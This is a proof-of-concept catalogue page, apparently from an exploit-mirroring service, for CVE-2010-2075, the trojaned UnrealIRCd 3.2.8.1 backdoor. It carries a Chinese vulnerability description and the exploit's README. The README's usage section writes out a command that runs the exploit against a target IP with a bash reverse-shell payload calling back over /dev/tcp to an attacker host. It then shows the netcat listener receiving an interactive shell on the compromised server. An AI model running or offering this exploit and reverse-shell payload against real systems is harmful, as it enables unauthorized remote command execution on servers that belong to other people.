CVE-2010-2075 PoC — UnrealIRCd 后门未授权访问漏洞

Source

https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1

Associated Vulnerability

Title:UnrealIRCd 后门未授权访问漏洞 (CVE-2010-2075)
Description:2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd，在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马)，远程攻击者可执行任意命令。

Description

Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.

Readme

# CVE-2010-2075
Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.
# Requirements
optparse, signal
# Usage
You can send a command to execute, but there will be times when it will not respond, but you can simply send a reverse shell and wait for it to arrive.
```bash
python3 CVE-2010-2075.py -t 10.0.2.119 -p 6667 -c 'bash -c "bash -i >& /dev/tcp/10.0.2.48/443 0>&1"'
Creating connection
Creating payload
[*]Sending Payload...
```
And I received the shell
```bash
nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.48] from (UNKNOWN) [10.0.2.119] 56916
bash: cannot set terminal process group (415): Inappropriate ioctl for device
bash: no job control in this shell
server@real:~/irc/Unreal3.2$
```

File Snapshot


 [4.0K]  /data/pocs/79429cee848a8d99a8f0e01b2df4ea093410da0a
├── [1.6K]  CVE-2010-2075.py
└── [ 751]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!